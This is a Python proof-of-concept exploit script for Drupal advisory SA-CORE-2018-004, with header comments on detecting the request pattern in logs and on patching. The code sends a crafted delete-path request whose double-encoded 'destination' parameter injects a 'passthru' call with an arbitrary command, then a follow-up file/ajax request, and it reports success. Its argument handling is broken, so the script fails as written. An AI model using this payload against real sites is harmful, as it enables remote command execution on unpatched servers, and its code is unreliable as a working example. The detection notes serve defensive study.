# Author: Alexandre Nguyen
#
# Proof-of-concept listing for the Drupal core advisory SA-CORE-2018-004.
#
# What the listing shows (useful when writing detections or reviewing logs):
#   1. A POST to a node's delete path ("?q=node/<id>/delete") whose
#      "destination" parameter carries a nested query string. The nested keys
#      are named q[%2523...]; %2523 is a double-encoded '#', so the '#' only
#      appears after the value has been decoded twice.
#   2. A follow-up POST to a "file/ajax/..." path that ends with the
#      form_build_id value read from the JSON body of the first response.
#
# Detection: look in web-server / WAF logs for "destination=" values that
# contain "%2523" or bracketed q[...] keys, followed shortly by a POST to a
# "file/ajax" path from the same client.
# Mitigation: apply the Drupal core update referenced by SA-CORE-2018-004.
#
# NOTE(review): not runnable as published. The module-level argument handling
# below fails before main() is reached, so read this as a description of the
# request pattern rather than as a working tool.
import requests
import argparse

parser = argparse.ArgumentParser(
    description='POC for Drupal vulnerability SA-CORE-2018-004'
)
parser.add_argument(
    "--command",
    help="Command to inject",
    required=True,
    action='store_true',
)
parser.add_argument(
    "--node_id",
    help="Node to target",
    required=True,
    action='store_true',
)
parser.add_argument(
    "--url",
    help="Drupal base URL",
    required=True,
    action='store_true',
)

args = parser.parse_args()
command = args.command
node_id = args.node_id
url = args.url
php_command = args[0]


def main():
    """Send the two requests of the PoC and print a one-line outcome.

    Reads the module-level ``url``, ``node_id`` and ``command`` values.
    The first POST goes to the node delete path with the crafted
    ``destination`` parameter; if its JSON body contains a
    ``form_build_id``, a second POST is sent to the ``file/ajax`` path
    built from that id. Returns nothing.
    """
    # Request 1: node delete path plus the nested, double-encoded q[...] keys.
    stage_one_url = (
        url
        + "/?q=node/"
        + node_id
        + "/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]="
        + command
    )
    first_reply = requests.post(stage_one_url)

    # The script treats a missing form_build_id as "not affected"; it may
    # equally mean the response was not the expected form at all.
    build_id = first_reply.json().get("form_build_id")
    if build_id is None:
        print('This target is not attackable !')
        return

    # Request 2: the file/ajax path keyed by the form_build_id from request 1.
    second_reply = requests.post(
        url + "/drupal/?q=file/ajax/actions/cancel/%23options/path/" + build_id
    )

    # The outcome is judged on the HTTP status alone; the response body is
    # never inspected, so a 200 here is not by itself proof of execution.
    if second_reply.status_code != 200:
        print('Command failed. HTTP status code:' + second_reply.status_code)
        return
    print('Attack success - command executed !')


main()